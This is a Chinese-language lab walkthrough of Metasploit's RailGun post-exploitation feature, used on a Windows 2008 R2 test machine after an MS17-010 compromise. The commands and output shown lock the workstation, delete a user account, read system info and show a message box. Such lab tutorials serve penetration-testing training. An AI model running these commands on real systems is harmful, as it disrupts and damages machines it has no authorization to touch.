RailGun 的实战测试

一、通过RailGun在一个方法中调用基础API

client.railgun.DLLname.function(parameters)

关键字client.railgun定义了我们需要客户端的RailGun功能。

关键字DLLname指明了在执行一个DLL文件调用时要使用的DLL名称。

关键字 function(parameters)指定需要从DLL文件中调用的API函数作为参数。

二、实例

1、实验环境

攻击机：kali 2019-3

靶机：win2008R2+XPSP3

漏洞：ms17-010

注意，通过 ms17-010 获取目标系统（win2008+xpsp3）的 meterpreter 控制之后方可进行以下测试

2、 锁屏测试

从user32.dll文件中调用的LockWorkStation()函数执行后导致被渗透系统进入了锁定状态

命令执行前：

>> railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "ErrorMessage"=>"\xB2\xD9\xD7\xF7\xB3\xC9\xB9\xA6\xCD\xEA\xB3\xC9\xA1\xA3", "return"=>true}

结果：

3、删除某一用户

client.railgun.netapi32.NetUserDel(arg1,agr2)

从客户的计算机上删除指定的用户。

删除前存在admin……和root两个用户，如下图：

meterpreter > irb
[*] Starting IRB shell...
[*] You are in the "client" (session) object

irb: warn: can't alias kill from irb_kill.
>> railgun.netapi32.NetUserDel(nil,"root")
=> {"GetLastError"=>997, "ErrorMessage"=>"FormatMessage failed to retrieve the error.", "return"=>0}
>>

删除后仅剩administrator，如下图：

注意：值nil指明了用户是在局域网中工作。然而，如果系统的目标是在一个不同的网络中，则应该把参数的值设定为目标系统的NET-BIOS值

4、 获取系统信息

>> sys.config.sysinfo['OS']
=> "Windows 2008 R2 (Build 7601, Service Pack 1)."

5、弹框测试

>> railgun.user32.MessageBoxA(0,'hello!','pr1s0n','MB_OK')
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}
>>

三、参考文献

《精通Metasploit渗透测试》